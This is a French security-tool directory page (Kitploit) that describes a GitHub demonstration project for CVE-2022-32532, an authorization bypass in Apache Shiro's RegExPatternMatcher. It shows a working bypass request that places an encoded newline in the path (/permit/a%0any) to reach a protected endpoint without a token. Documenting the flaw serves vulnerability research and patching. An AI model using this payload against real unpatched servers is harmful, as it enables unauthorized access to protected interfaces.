Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
Outils/GitHubGitHub/lay0us/cve-2022-32532
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

Voir le dépôt
1325il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-32532

À propos

Ceci est un projet de démonstration, qui ne montre qu'une des conditions pour exploiter cette vulnérabilité (CVE-2022-32532).

En réalité, il existe plus de façons de l'exploiter, tant que les développeurs utilisent RegExPatternMatcher, il y aura une possible vulnérabilité de contournement.

Introduction

La vérification de l'en-tête de requête Token est requise sous la configuration actuelle, sinon vous n'avez pas la permission d'accéder à l'interface sous /permit

Cette requête peut réussir

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

L'accès n'est pas autorisé lorsqu'il n'y a pas d'en-tête de requête Token

root@kitploit:~
GET /permit/any HTTP/1.1

Il peut être contourné de manière simple dans des configurations spéciales mais courantes

root@kitploit:~
GET /permit/a%0any HTTP/1.1

Référence

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

Cette vulnérabilité est similaire à Spring-Security CVE-2022-22978

Merci à bdemers (Apache Shiro PMC) et chybeta (Chercheur en sécurité)

Télécharger l’outil